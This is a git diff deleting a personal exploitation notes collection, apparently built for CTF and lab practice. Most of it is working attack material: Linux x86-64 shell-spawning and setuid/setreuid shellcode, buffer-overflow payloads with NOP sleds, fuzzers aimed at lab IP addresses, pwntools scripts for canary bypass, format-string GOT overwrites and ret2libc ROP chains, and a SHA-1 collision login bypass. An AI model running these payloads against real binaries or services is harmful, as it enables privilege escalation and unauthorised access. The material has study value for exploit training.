-python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'+ '\x41' * 60 + '\xef\xbe\xad\xde')" | xargs ./buffer-overflow
-```
-
-## Finding Offset
-### via gdb segfault output 
-* 64 bit addresses use 6 out of 8 byte for addresses.
-```sh
-gdb ./application
-run $(python -c "print('\x41' * 180)")
-```
-* Return address hit completely when 6 bytes are filled.
-```sh
-Program received signal SIGSEGV, Segmentation fault.
-0x0000414141414141 in copy_arg ()
-```
-* Buffer = measured_length - (`$rbp` + 6 bytes return address)
-
-### via metasploit
-```sh
-/opt/metasploit/tools/exploit/pattern_create.rb -l 180
-```
-* Looking for `rbp` Content in front of the return address to measure offset
-```sh
-(gdb) i r
-[...]
-rbp             0x<rbpAddress>  0x<rbpConent>
-[...]
-```
-* Measure offset
-```sh
-pt/metasploit/tools/exploit/pattern_offset -l 180 -q <rbpContent>
-```
-
-## Crafting Payload
-* Contains Junk/NOPslice + shellcode + Junk over rbp + return address
-* Inside gdb
-```sh
-run $(python -c "print('A' * 100 + <shellcode> + 'A' * 12 + 'B' * 6)")
-```
-* Check actual stack
-```sh
-(gdb) x/100x $rsp-200
-0x7fffffffe228: 0x00400450  0x00000000  0xffffe3e0  0x00007fff
-0x7fffffffe238: 0x00400561  0x00000000  0xf7dce8c0  0x00007fff
-0x7fffffffe248: 0xffffe64d  0x00007fff  0x41414141  0x41414141
-0x7fffffffe258: 0x41414141  0x41414141  0x41414141  0x41414141
-0x7fffffffe268: 0x41414141  0x41414141  0x41414141  0x41414141
-0x7fffffffe278: 0x41414141  0x41414141  0x41414141  0x41414141
-0x7fffffffe288: 0x41414141  0x41414141  0x41414141  0x41414141
-0x7fffffffe298: 0x41414141  0x41414141  0x41414141  0x41414141
-0x7fffffffe2a8: 0x41414141  0x41414141  0x41414141  0x48583b6a
-0x7fffffffe2b8: 0xb849d231  0x69622f2f  0x68732f6e  0x08e8c149
-[...]
-```
-* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`.
-## NopSled
-* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`.
-```sh
-(gdb) x/100x $rsp-200
-0x7fffffffe228: 0x00400450  0x00000000  0xffffe3e0  0x00007fff
-0x7fffffffe238: 0x00400561  0x00000000  0xf7dce8c0  0x00007fff
-0x7fffffffe248: 0xffffe64d  0x00007fff  0x90909090  0x90909090
-0x7fffffffe258: 0x90909090  0x90909090  0x90909090  0x90909090
-0x7fffffffe268: 0x90909090  0x90909090  0x90909090  0x90909090
-0x7fffffffe278: 0x90909090  0x90909090  0x90909090  0x90909090
-0x7fffffffe288: 0x90909090  0x90909090  0x90909090  0x90909090
-0x7fffffffe298: 0x90909090  0x90909090  0x90909090  0x90909090
-0x7fffffffe2a8: 0x90909090  0x90909090  0x90909090  0x48583b6a
-0x7fffffffe2b8: 0xb849d231  0x69622f2f  0x68732f6e  0x08e8c149
-```
-* Convert return address to little endian `0x7fffffffe2a8` -> `\xa8\xe2\xff\xff\xff\x7f` and put it inside the return address
-```sh
-run $(python -c "print('\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'+'A'*12+'\xa8\xe2\xff\xff\xff\x7f')")
-```
-
-## setuid() and setreuid()
-* Shellcode needs `setuid(0)` for effective root uid or the equivalent id of the account needed.
-* `/bin/sh` checks real uid not effective uid
-* ./shellcodes/setuid_shell.as
-
-### setreuid() in assembler
-* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
-* `setreuid(1002,1002)` sets the __real__ uid inside the shell to 1002.
-* `setreuid()` has `rax` number `\x71` (`113` dec). Args are stored in `rdi` and `rsi`.
-* ./shellcode/setreuid_shell.as 
-```sh
-"\x48\x31\xFF\x48\x31\xC0\x48\x31\xF6\x66\xBE\xEA\x03\x66\xBF\xEA\x03\xB0\x71\x0F\x05\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05"
-```
-* Convert to hex output via [Defuse](https://defuse.ca/online-x86-assembler.htm)
-
-### setreuid() in shellcode using pwntools
-* Shellcraft builds a shellcode containing `setreuid()`, without any parameter given the real uid to the file owner.
-```sh
-* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
-shellcraft -f d amd64.linux.setreuid
-```
-* The uid can be set as an argument 
-```sh
-shellcraft -f d amd64.linux.setreuid <uid> 
-```
-* Prepend this in front of the existing shellcode like this
-```sh
-run $(python -c "print('\x90' * 99 + '\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B' * 8 + '\x88\xe2\xff\xff\xff\x7f')")
-```
-    * Where the existing shellcode is the following
-    ```sh
-    \x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
-    ```
-    * Setreuid part is the following
-    ```sh
-    \x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05
-    ``` 
diff --git a/exploit/binaries/buffer_overflow/docs/shellcodes/setreuid_shell.as b/exploit/binaries/buffer_overflow/docs/shellcodes/setreuid_shell.as
deleted file mode 100644
index ef1c822..0000000
--- a/exploit/binaries/buffer_overflow/docs/shellcodes/setreuid_shell.as
+++ /dev/null
@@ -1,23 +0,0 @@
-xor    rdi,rdi            <------ set the rdi to 0
-xor    rax,rax      
-xor    rsi, rsi         <------ set the rsi to 0
-mov    si, 1002         <------ put the value 1002 in the lower bits of the rsi
-mov    di, 1002         <------ put the value 1002 in the lower bits of the rdi
-mov    al,0x71          <------ put the setruid function in the al register      
-syscall                 <------ call the function.
-xor    rdx,rdx
-movabs rbx,0x68732f6e69622fff
-shr    rbx,0x8
-push   rbx
-mov    rdi,rsp
-xor    rax,rax
-push   rax
-push   rdi
-mov    rsi,rsp
-mov    al,0x3b
-syscall
-push   0x1
-pop    rdi
-push   0x3c
-pop    rax
-syscall
diff --git a/exploit/binaries/buffer_overflow/docs/shellcodes/setuid_shell.as b/exploit/binaries/buffer_overflow/docs/shellcodes/setuid_shell.as
deleted file mode 100644
index 94cae5a..0000000
--- a/exploit/binaries/buffer_overflow/docs/shellcodes/setuid_shell.as
+++ /dev/null
@@ -1,38 +0,0 @@
-//setuid(0) + execve(/bin/sh) - just 4 fun. 
-//xi4oyu [at] 80sec.com
- 
-/*
-main(){
-    __asm(  "xorq %rdi,%rdi\n\t"
-            "mov $0x69,%al\n\t"
-            "syscall \n\t"
-            "xorq   %rdx, %rdx \n\t"
-            "movq   $0x68732f6e69622fff,%rbx; \n\t"
-            "shr    $0x8, %rbx; \n\t"
-            "push   %rbx; \n\t"
-            "movq   %rsp,%rdi; \n\t"
-            "xorq   %rax,%rax; \n\t"
-            "pushq  %rax; \n\t"
-            "pushq  %rdi; \n\t"
-            "movq   %rsp,%rsi; \n\t"
-            "mov    $0x3b,%al; \n\t"
-            "syscall ; \n\t"
-            "pushq  $0x1 ; \n\t"
-            "pop    %rdi ; \n\t"
-            "pushq  $0x3c ; \n\t"
-            "pop    %rax ; \n\t"
-            "syscall  ; \n\t"
-    );
-}
-*/
-main() {
-        char shellcode[] =
-        "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
-        "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
-        "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
-        "\x58\x0f\x05";
-        (*(void (*)()) shellcode)();
-}
- 
-//2009-05-14
-//evil.xi4oyu 
diff --git a/exploit/binaries/buffer_overflow/fuzzer.py b/exploit/binaries/buffer_overflow/fuzzer.py
deleted file mode 100755
index 6bc6480..0000000
--- a/exploit/binaries/buffer_overflow/fuzzer.py
+++ /dev/null
@@ -1,24 +0,0 @@
-#!/usr/bin/env python
-import sys, time, socket
-
-ip = "192.168.56.102"
-port = 31337
-timeout = 5
-prefix = ""
-counter = 100
-
-string  = prefix + "A" * counter
-while True:
-    try:
-        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
-            s.connect((ip, port))
-            print ('[+] Sending buffer')
-            #s.recv(1024)
-            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
-            s.send(bytes(string + '\r\n', "latin1"))
-            s.recv(1024)
-    except:
-        print ("[!] The program can't be reached")
-        sys.exit(0)
-    string += counter * 'A'
-    time.sleep(1)
diff --git a/exploit/binaries/buffer_overflow/fuzzer2.py b/exploit/binaries/buffer_overflow/fuzzer2.py
deleted file mode 100644
index c46e581..0000000
--- a/exploit/binaries/buffer_overflow/fuzzer2.py
+++ /dev/null
@@ -1,24 +0,0 @@
-#!/usr/bin/env python2
-import sys,socket
-import time
- 
-address = '192.168.56.102'
-port = 9999
-buffer = ['A']
-counter = 100
-while len(buffer) < 10:
- buffer.append('A'*counter)
- counter=counter+100
-try:
- for string in buffer:
-  print '[+] Sending %s bytes...' % len(string)
-  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-  connect=s.connect((address,port))
-  s.send(string + '\r\n')
-  s.recv(1024)
-  print '[+] Done'
-except:
-  print '[!] Unable to connect to the application. You may have crashed it.'
-  sys.exit(0)
-finally:
- s.close()
diff --git a/exploit/binaries/buffer_overflow/fuzzer_BO.py b/exploit/binaries/buffer_overflow/fuzzer_BO.py
deleted file mode 100755
index b098066..0000000
--- a/exploit/binaries/buffer_overflow/fuzzer_BO.py
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env python3
-
-import socket, time, sys
-
-ip = "10.10.161.147"
-port = 9999
-timeout = 5
-prefix = ""
-
-string = prefix + "A" * 100
-
-while True:
-    try:
-        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
-            s.settimeout(timeout)
-            s.connect((ip, port))
-            s.recv(1024)
-            s.recv(1024)
-            s.send("User" '\r\n')
-            #print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
-            s.send(bytes(string, "latin-1"))
-            s.recv(1024)
-            s.send(string + '\r\n')
-            #print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
-            print(f"fuzzing with {len(string)} bytes")
-    except:
-        #print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
-        sys.exit(0)
-    string += 100 * "A"
-    time.sleep(1)
-
diff --git a/exploit/binaries/buffer_overflow/pwn_fuzz.py b/exploit/binaries/buffer_overflow/pwn_fuzz.py
deleted file mode 100644
index 55c0c18..0000000
--- a/exploit/binaries/buffer_overflow/pwn_fuzz.py
+++ /dev/null
@@ -1,8 +0,0 @@
-import pwn
-
-r = pwn.remote("10.10.156.228", 9999)
-r.recvuntil(":")
-r.send("User\r\n")
-r.recvuntil(":")
-r.send(b'A' * 2200)
-r.recvuntil("message:")
diff --git a/exploit/binaries/buffer_overflow/ropping.md b/exploit/binaries/buffer_overflow/ropping.md
deleted file mode 100644
index 8abd17c..0000000
--- a/exploit/binaries/buffer_overflow/ropping.md
+++ /dev/null
@@ -1,28 +0,0 @@
-# ROP Chaining
-
-## Usage
-
-* Find cyclic buffer size
-* Find gadgets via `ropper` or even better `ropstar`
-
-## Example
-```python
-from pwn import *
-
-s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
-p = s.process(['sudo', '<process>'])
-
-offset=<found_offset_len>
-
-# take the ropchain from ropstar
-payload = cyclic(offset)
-payload += p64(0x4711)
-payload += p64(0x235)
-payload += p64(0x007)
-
-print(p.recv())
-p.sendline(payload)
-print(p.recv())
-p.sendline("/bin/sh")
-p.interactive(prompt='')
-```
diff --git a/exploit/binaries/buffer_overflow/ropstar b/exploit/binaries/buffer_overflow/ropstar
deleted file mode 160000
index f025a2e..0000000
--- a/exploit/binaries/buffer_overflow/ropstar
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit f025a2e4923b501d68d24fa44b22869a84e29e3e
diff --git a/exploit/binaries/canary_bypass/canary_bypass.md b/exploit/binaries/canary_bypass/canary_bypass.md
deleted file mode 100644
index 19fdea5..0000000
--- a/exploit/binaries/canary_bypass/canary_bypass.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# Canary Bypass
-
-* Get canary value from stack via string format exploit as an offset
-```sh
-%42$p
-```
-* Use the found value to add it to the payload
-* Afterwards, if the binary is PIE a pointer to the main or the elf which is stack aligned should be found
-
-
diff --git a/exploit/binaries/canary_bypass/canary_bypass.py b/exploit/binaries/canary_bypass/canary_bypass.py
deleted file mode 100644
index 9cc903a..0000000
--- a/exploit/binaries/canary_bypass/canary_bypass.py
+++ /dev/null
@@ -1,19 +0,0 @@
-#!/usr/bin/env python
-
-from pwn import *
-from time import sleep
-
-
-#elf = context.binary =  ELF('./pwn107.pwn107')
-#p = process()
-p = remote('10.10.216.4', 9007)
-sleep(1)
-p.sendline(b'%13$p,%19$p') # No. on stack. 1st: canary, 2nd: pointer to main function
-sleep(1)
-addresses = (p.recv().split())[62].decode().split(',')
-print(addresses)
-# Payload: Buffer + canary content + bsp + return pointer filled with address of the hidden function
-payload = b'A' * 24 + p64(int(addresses[0],16)) + b'B' * 8 + p64(int(addresses[1], 16) - 0x45) 
-p.sendline(payload)
-sleep(1)
-p.interactive()
diff --git a/exploit/binaries/format_string/format_string.md b/exploit/binaries/format_string/format_string.md
deleted file mode 100644
index ef739fd..0000000
--- a/exploit/binaries/format_string/format_string.md
+++ /dev/null
@@ -1,105 +0,0 @@
-# Format String
-
-* Read and write values from stack
-* [axcheron's writeup](https://axcheron.github.io/exploit-101-format-strings/)
-
-## Parameters
-
-|Parameters       |Type                                       |Passed as
-|-----------------|-------------------------------------------|-----------|
-%d                decimal (int)                                 value
-%u                unsigned decimal (unsigned int)               value
-%x                hexadecimal (unsigned int)                    value
-%p                hexadecimal (unsigned int), nice layout       value
-%s                string ((const) (unsigned) char*)             reference
-%n                write the number of bytes ypu put in, (*int)  reference
-
-## Offset
-
-* Read at offset as pointer value at the 42th argument on the stack
-```sh
-%42$s
-```
-* If the pointer at the offset references a string you can dereference by
-```sh
-%42$s
-```
-
-## Length of output
-
-* Padding of the first argument on stack to the given length
-```sh
-%31337x
-```
-
-## Read
-
-* Input `%x` for every value that should be read from the stack. These are the next values at lower addresses, directly under the print format function
-```sh
-%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x 
-```
-
-* Do long long hex reading from stack
-```sh
-%llx
-```
-
-* Select values as string, e.g. the second value
-```sh
-%2$s
-```
-* Another way of reading the pointer is via 
-```sh
-%p
-```
-* Read pointer on stack at offset 42
-```sh
-%42$p
-```
-
-* [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one
-```python
-from pwn import *
-
-#p = process('./vuln')
-p = remote(target_ip, 9006)
-
-payload = b'%14$p||||'                                                                                                         
-payload += p32(0x8048000)
-
-p.sendline(payload)
-log.info(p.clean())
-```
-
-## Write
-
-* Writing is done via `%n`
-* An example, GOT overwrite. We want to replace the pointer address
-    * Watch out for the `PTR` from PLT to GOT
-```sh
-objdump -Mintel -d <binary>
-
-[...]
-0000000000401060 <printf@plt>:
-  401060:	ff 25 ca 2f 00 00    	jmp    QWORD PTR [rip+0x2fca]        # 404030 <printf@GLIBC_2.2.5>
-  401066:	68 03 00 00 00       	push   0x3
-  40106b:	e9 b0 ff ff ff       	jmp    401020 <_init+0x20>
-[...]
-```
-* The `PTR` derefences __0x404030__
-* As an example, the parameter is found at arg 6 on the stack
-* Write the address of a function that cannot be reached into the PLT `PTR` to GOT through the buffer, so it will execute. The address which should be written is `0x40123b`
-* The input is as follows
-```sh
-%64c%6$n<restof address - 67>c   %13$hn
-```
-* `64c` is `0x40`, rest of address - bytes already + 2 bytes alignment
-
-## Tips and Tricks
-
-* Overwrite GOT when there is no FullRELRO, when it is not read only
-* Find the input argument on the stack. Write `AAAA` and look out where it is placed on the stack
-```sh
-AAAA%6$p
-```
-
diff --git a/exploit/binaries/integral_promotion/integral_promotion.md b/exploit/binaries/integral_promotion/integral_promotion.md
deleted file mode 100644
index abb579b..0000000
--- a/exploit/binaries/integral_promotion/integral_promotion.md
+++ /dev/null
@@ -1,42 +0,0 @@
-# Integral Promotion
-
-* Conditions of data types with different max and min values provoke unforseen comparisions
-* Comparing `int` and `uint` with values above max leads to integral promotion
-
-* Check data type min and max
-```c
-#include <stdio.h>
-#include <limits.h>
-
-int main(void)
-{
-
-    printf("CHAR_MAX: %i\n", CHAR_MAX);     
-    printf("UCHAR_MAX: %i\n", UCHAR_MAX);
-
-    printf("SHORT_MAX: %i\n", SHRT_MAX);        
-    printf("USHORT_MAX: %i\n", USHRT_MAX);
-
-    printf("INT_MAX: %i\n", INT_MAX);       
-    printf("UINT_MAX: %u\n", UINT_MAX);
-
-    return 0;
-}
-```
-
-* Not only conditions are susceptable to integral promotions, a sum - for example - is too. Values for promotion in this example are `2147483647` and `1`. `c` is negative and leads to the shell 
-```c
-    int a,b,c;
-
-
-    if(a >=0 && b >=0)
-        if(c >= 0){
-            printf("\n[*] ADDING %d + %d",a,b);
-            printf("\n[*] RESULT: %d\n",c);
-        }
-        else{
-             system("/bin/sh");
-        }
-    else
-        printf("nope");
-```
diff --git a/exploit/binaries/plt_got.md b/exploit/binaries/plt_got.md
deleted file mode 100644
index ada5f2d..0000000
--- a/exploit/binaries/plt_got.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# Procedure Lookup Table, Global Offset Table
-
-* Both are part of dynamic binaries
-* PLT resolves called function address of shared object
-* A function call inside the binary, to a function inside a shared object is done via PLT
-* __PLT__ contains dynamic address, references GOT
-* __GOT__ contains the absolute address of the called functions. Dynamic linker updates the GOT
-* __Lazy Linking__ is the process of loading the called SO function after they are called for the first time
-
-
-## pwn
-
-* Overwrite the GOT address of a called functions, which then will be returned instead
-
-* Check the disassembly of the binary for SO function call
-```sh
-x/s <functionaddress>
-x/3i <functionaddress>
-```
-* This is the PLT address
-* Check the GOT address of the PLT. There should be `PTR` via `jmp` to the GOT address of the function
-
-* Rewrite this address with for example `system`. Take a look where it is placed
-```sh
-p system
-```
-* Set the address of the `jmp` to GOT to `system` address
-```sh
-set *<foundGOTjmpAddress>=<foundSystemAddress>
-```
-
-* Fill the buffer with the argument to `system`
diff --git a/exploit/binaries/r2.md b/exploit/binaries/r2.md
deleted file mode 100644
index 54bcba1..0000000
--- a/exploit/binaries/r2.md
+++ /dev/null
@@ -1,99 +0,0 @@
-# Radare2
-
-## Usage
-### Debug
-```sh
-r2 -d <binary>
-```
-* Analyze
-```sh
-aaa
-```
-* Show all info
-```sh
-ia
-```
-* Search for strings
-```sh
-izz
-```
-* Main address
-```sh
-iM
-```
-* Entrypoint
-```sh
-ie
-```
-* Current memory address
-```sh
-s
-```
-* Show address of function or register, respectively
-```sh
-s <func>
-sr <reg>
-```
-* Show main
-```sh
-pdf @main
-```
-* Show main and follwing functions
-```sh
-pd @main
-```
-* Breakpoint
-```sh
-db 0xdeadbeef
-```
-* Show all breakpoints
-```sh
-dbi
-```
-* Show rbp-0x4
-```sh
-px @rbp-0x4
-```
-* Continue
-```sh
-dc
-``` 
-* Step
-```sh
-ds
-```
-* Show registers
-```sh
-dr
-```
-* Restart
-```sh
-ood
-```
-### Visual Mode
-* Enter visual mode via `VV`
-* Enter normal mode inside visual mode via `:`
-* Add comment via `;`
-
-### Write Mode
-* Enter write mode via `w`
-* Write cache list via `wc`
-* Alter/modify opcode at current seek via `wA`
-* Use as follows
-```sh
-s <memoryaddress>
-wx <newOpcode>
-dc
-```
-
-## AT&T Instructions
-* leaq src, dst: this instruction sets dst to the address denoted by the expression in src
-* addq src, dst: dst = dst + src
-* subq src, dst: dst = dst - src
-* imulq src, dst: dst = dst * src
-* salq src, dst: dst = dst << src 
-* sarq src, dst: dst = dst >> src
-* xorq src, dst: dst = dst XOR src
-* andq src, dst: dst = dst & src
-* orq src, dst: dst = dst | src
-
diff --git a/exploit/binaries/ret2libc.md b/exploit/binaries/ret2libc.md
deleted file mode 100644
index 1de7011..0000000
--- a/exploit/binaries/ret2libc.md
+++ /dev/null
@@ -1,130 +0,0 @@
-# Ret2libc
-
-* [ir0nstone ret2libc](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc)
-
-* Check binary via
-    * `checksec`, PIE shows start address, RELRO shows permissions of r/w to got
-    * `file`
-* Libc is affected by ASLR state of the machine, check via `cat /proc/sys/kernel/randomize_va_space`
-    * Off = 0
-    * Partial = 1
-    * Full = 2
-* `got` contains dynamically loaded functions
-* `plt` contains used loaded dynamical functions
-
-## Finding something to execute
-* Interesting stuff to call from inside libc
-    * `/bin/sh`
-    * `system`
-
-## libc -- Finding Offsets 
-
-* Find libc address at runtime via gbd
-```sh
-info sharedlibrary
-```
-
-### Manually
-* On target find `sh` address inside libc
-```sh
-strings -a -t x /lib32/libc.so.6 | grep /bin/sh
-```
-* Sub from `system` address from inside libc
-```sh
-readelf -s /lib32/libc.so.6 | grep system
-```
-
-### Measure the Buffer
-* With gef
-    * `pattern create`
-    * `run`
-    * Use pattern
-    * `pattern search $<register>`
-
-## ROP -- Creating a Chain
-
-* Creating a ROP chain to execute the `/bin/sh` with parameters
-* Check
-    * Architecture
-    * Calling convention
-
-### Manually
-
-```sh
-ROPgadget --binary <file> | grep rdi
-```
-* Find `ret`s, to put in front of rdi
-```sh
-objdump -d <file> | grep ret
-```
-
-## Automated 
-
-* [xct's ropstar](https://github.com/xct/ropstar.git)
-
-## Example without ASLR
-```python
-from pwn import *
-
-p = process('<binary>')
-
-cbase = 0x<libc_base>
-sys = cbase + <libc_system>
-sh = cbase + <libc_shell>
-rop_rdi = <found rop rdi>
-rop_ret = <found rop ret>
-
-payload =  b'A' * <count>
-payload += b'B' * 8
-payload += p64(rop_ret)
-payload += p64(rop_rdi)
-payload += p64(sh)
-payload += p64(system)
-payload += p64(0x0) # end payload
-
-p.recv()
-p.sendline(payload)
-p.interactive()
-```
-
-## Example with ASLR
-* Create context
-```python
-#!/usr/bin/env python3
-
-from pwn import *
-
-context.binary = binary = '<binary>'
-elf = ELF(binary)
-rop = ROP(elf)
-libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
-p = process()
-
-# ROP I, needed when ASL is enabled
-payload =  b'A' * 18
-payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
-payload += p64(elf.got.gets)
-payload += p64(elf.plt.puts)
-payload += p64(elf.symbols.main)
-
-p.recvline()
-p.sendline(payload)
-p.recvline()
-leak = u64(p.recvline().strip().ljust(8,b'\0')) # ljust, pre padding for alignement
-p.recvline()
-
-log.info(f"gets: {hex(leak)}")
-libc.address = leak - libc.symbols.gets
-log.info(f"libc address: {hex(libc.address)}")  # start address should be aligned
-
-# ROP II
-payload = b'A' * 18
-payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
-payload += p64(next(libc.search(b'/bin/sh')))
-payload += p64(rop.find_gadget(['ret'])[0])
-payload += p64(libc.symbols.system)
-
-p.sendline(payload)
-p.recvline()
-p.interactive()
-```
diff --git a/exploit/dns/zone_transfer.md b/exploit/dns/zone_transfer.md
deleted file mode 100644
index 9ca6fce..0000000
--- a/exploit/dns/zone_transfer.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# DNS Zone Transfer
-
-Relies on misconfiguration of the zone's master. Just query a domain from the master, if possible. Results in a disclosure of subdomains and all records previously made.
-```sh
-drill axfr test.com @<master-DNS>
-```
diff --git a/exploit/hashes/collision.md b/exploit/hashes/collision.md
deleted file mode 100644
index 800acfa..0000000
--- a/exploit/hashes/collision.md
+++ /dev/null
@@ -1,33 +0,0 @@
-# Hash Collisions
-
-# SHA-1
-
-* http://shattered.io
-* The following code is taken from a writeup from [bl4ade's repo](https://github.com/bl4de/ctf/blob/master/2017/BostonKeyParty_2017/Prudentialv2/Prudentialv2_Cloud_50.md)
-```python
-#!/usr/bin/env python
-import requests
-
-# this is copy/paste from Hex editor - two different files with the same SHA1 checksum
-name = '255044462D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7F46DC93 A6B67E01 3B029AAA 1DB2560B 45CA67D6 88C7F84B 8C4C791F E02B3DF6 14F86DB1 690901C5 6B45C153 0AFEDFB7 6038E972 722FE7AD 728F0E49 04E046C2 30570FE9 D41398AB E12EF5BC 942BE335 42A4802D 98B5D70F 2A332EC3 7FAC3514 E74DDC0F 2CC1A874 CD0C7830 5A215664 61309789 606BD0BF 3F98CDA8 044629A1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
-
-password = '25504446 2D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7346DC91 66B67E11 8F029AB6 21B2560F F9CA67CC A8C7F85B A84C7903 0C2B3DE2 18F86DB3 A90901D5 DF45C14F 26FEDFB3 DC38E96A C22FE7BD 728F0E45 BCE046D2 3C570FEB 141398BB 552EF5A0 A82BE331 FEA48037 B8B5D71F 0E332EDF 93AC3500 EB4DDC0D ECC1A864 790C782C 76215660 DD309791 D06BD0AF 3F98CDA4 BC4629B1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
-
-print '[+] create URL decoded strings to send as GET parameters [name] and [password]...'
-name = ''.join(name.split(' '))
-password = ''.join(password.split(' '))
-
-namestr = ''.join(['%' + name[i] + name[i + 1]
-           for i in range(0, len(name)) if i % 2 == 0])
-
-passwordstr = ''.join(['%' + password[j] + password[j + 1]
-           for j in range(0, len(password)) if j % 2 == 0])
-
-print '[+] sending request to http://54.202.82.13/?name=[name]&password=[password]'
-
